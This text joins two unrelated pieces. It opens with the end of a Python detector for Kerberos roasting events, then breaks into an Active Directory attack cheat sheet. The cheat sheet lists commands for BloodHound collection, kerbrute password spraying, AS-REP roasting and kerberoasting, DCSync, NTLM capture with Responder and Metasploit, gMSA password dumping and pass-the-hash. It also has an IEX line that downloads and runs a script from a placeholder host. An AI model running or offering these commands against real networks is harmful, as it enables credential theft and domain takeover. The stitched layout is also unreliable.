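    _event(EventID=4769, TargetUserName="alice@CORP.LOCAL", ServiceName="backupsvc",
           TicketEncryptionType="0x17", Status="0x0", IpAddress="::ffff:10.0.0.25"),
    # RC4 ticket for a machine account: normal in mixed domains, not reported
    _event(EventID=4769, TargetUserName="alice@CORP.LOCAL", ServiceName="SRV01$",
           TicketEncryptionType="0x17", Status="0x0", IpAddress="::ffff:10.0.0.25"),
    # AES service ticket: not reported
    _event(EventID=4769, TargetUserName="bob@CORP.LOCAL", ServiceName="fileshare-svc",
           TicketEncryptionType="0x12", Status="0x0", IpAddress="::ffff:10.0.0.31"),
    # TGT issued with no pre-authentication and RC4: AS-REP roastable account in use
    _event(EventID=4768, TargetUserName="svc_legacy", ServiceName="krbtgt",
           TicketEncryptionType="0x17", PreAuthType="0", Status="0x0",
           IpAddress="::ffff:10.0.0.25"),
    # Ordinary AES TGT with timestamp pre-auth: not reported
    _event(EventID=4768, TargetUserName="carol", ServiceName="krbtgt",
           TicketEncryptionType="0x12", PreAuthType="2", Status="0x0",
           IpAddress="::ffff:10.0.0.40"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

In production the same logic runs over events exported from the DC's Security log; the RC4 condition also surfaces service accounts that still lack AES keys, which is what makes them roastable in the first place.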
## ------------------| Load SharpHound.ps1
## If you use the PowerShell collector, download it from the BloodHound 4.0.3 release
## https://github.com/BloodHoundAD/BloodHound/releases/tag/4.0.3
wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/d8163c0650ada9ef4a6ebc5e2dc8f5fde566e73f/Collectors/SharpHound.ps1
IEX(New-Object Net.WebClient).DownloadString('http://<IP>/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All
## ------------------| Collect info
.\SharpHound.exe -c all,GPOLocalGroup,LoggedOn
.\SharpHound.exe -c all -d <DomainName>
.\SharpHound.exe --CollectionMethods all,GPOLocalGroup,LoggedOn
## ------------------| Usage
-s, --searchforest Search all available domains in the forest
--stealth Stealth Collection (Prefer DCOnly whenever possible!)
--outputprefix String to prepend to output file names
--memcache Keep cache in memory and don't write to disk
--zipfilename Filename for the zip
--zippassword Password protects the zip with the specified password
-c, --collectionmethods (Default: Default) Collection Methods: Container, Group, LocalGroup, GPOLocalGroup,
Session, LoggedOn, ObjectProps, ACL, ComputerOnly, Trusts, Default, RDP, DCOM, DCOnly
## ------------------| Run
git clone https://github.com/dirkjanm/BloodHound.py.git && cd BloodHound.py
python3 bloodhound.py -d <domain> -u <username> -p '<password>' -gc <domain> -c all -ns <IP> --zip --dns-timeout 30
## ------------------| Usage
-u Username. Format: username[@domain]; If the domain is unspecified, the current domain is used.
-p Password
-k Use kerberos
--hashes LM:NTLM hashes
-ns Alternative name server to use for queries
--dns-tcp Use TCP instead of UDP for DNS queries
--dns-timeout DNS query timeout in seconds (default: 3)
-d Domain to query.
-dc Override which DC to query (hostname)
-gc Override which GC to query (hostname)
-w Number of workers for computer enumeration (default: 10)
-v Enable verbose output
BloodHound-Python
## ------------------| Dump domain info
pip3 install bloodhound
bloodhound-python -u <username> -p '<password>' -d <domain> -ns <IP> --dns-tcp -c All --zip
LDAPDomainDump
## ------------------| Only Json output
ldapdomaindump --no-grep --no-html -o ldapinfo <IP> -u <domain>\\<username> -p <password>
## ------------------| Only HTML output
ldapdomaindump --no-json --no-grep -o ldapinfo <IP> -u <domain>\\<username> -p <password>
BloodHound & neo4j raw queries
## ------------------| List all users
MATCH (u:User) return u
MATCH (u:User) return u LIMIT 10
## ------------------| List users with properties
MATCH (u:User) WHERE u.name CONTAINS "ADMIN" return u.name, u.displayname, u.description
## ------------------| Count computers by whether LAPS is enabled
MATCH (c:Computer) RETURN c.haslaps, COUNT(*)
## windapsearch enumerates the domain via an LDAP anonymous bind
/opt/windapsearch/windapsearch-linux-amd64 -d <IP> -m users --proxy 127.0.0.1:1080
## ------------------| User Enumeration
kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt -d <domain> --dc <IP>
kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d <domain> --dc <IP>
## ------------------| Password Spray
kerbrute passwordspray <usernames.txt> -d <domain> --dc <IP> '<password>'
## ------------------| AS-REP Roasting
kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --downgrade -d <domain> --dc <IP> > hashes.out
impacket-rpcdump <IP>
## check if the spooler service is running
impacket-rpcdump <IP> | grep -A2 -B2 MS-RPRN
## One service that can be leveraged to escalate privileges in the domain is the
## Spooler service: it allows triggering authentication as the computer account of
## the host it runs on, which can then be relayed or cracked.
## The SharpUp command can be used to run privilege escalation checks
sharpup audit
## The shellcmd grunt command is used to issue shell commands
shellcmd whoami
## Import PowerShell script
PowerShellImport // PowerView.ps1
## Execute powershell script
PowerShell Get-DomainComputer | Select name
## kerberoast the users, MakeToken before run this command
Rubeus kerberoast
Kerberoast <UserName> hashcat
## impersonate (login to user) users using the MakeToken command
MakeToken username domainname password LOGON32_LOGON_INTERACTIVE
## DCSync
DCSync Administrator
## ------------------| Add DNS Record
python3 dnstool.py -u 'intelligence\tiffany.molina' -p <password> -r h4rithd -a add -t A -d <myIP> <RemoteIP>
#### -u intelligence\Tiffany.Molina - The user to authenticate as;
#### -p <password> - The user's password;
#### --action add - Adding a new record;
#### --record h4rithd - The domain to add;
#### --data <MyIP> - The data to add, in this case, the IP to resolve h4rithd to;
#### --type A - The type of record to add.
## ------------------| Check if it success
nslookup
> server <RemoteIP>
> h4rithd.intelligence.htb
## If it resolves to my IP, the record was added
## ------------------| Using Responder
sudo responder -I tun0
## ------------------| Using Metasploit
use auxiliary/server/capture/http_ntlm
set SRVPORT 80
set URIPATH /
set SRVHOST <MyIP>
set JOHNPWFILE passwords
run
## ------------------| If it has ReadGMSAPassword
python3 gMSADumper.py -u <user> -p <password_or_LM:NT> -l <ldap_server_ip> -d <domain>
## ------------------| Verify the hash using crackmapexec
crackmapexec smb 10.10.10.248 -u svc_int$ -H b98d4cef68f72a98dfeed732d1b1abca
^^ If you have the hash, you can generate a silver ticket.
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/getTGT.py
python3 getTGT.py <domain>/<username>:<password>
export KRB5CCNAME=<username>.ccache
klist
## ------------------| Get Domain SID
impacket-getPac -targetUser Administrator <Domain>/<User>:<Password>
## ------------------| With Rubeus
.\Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat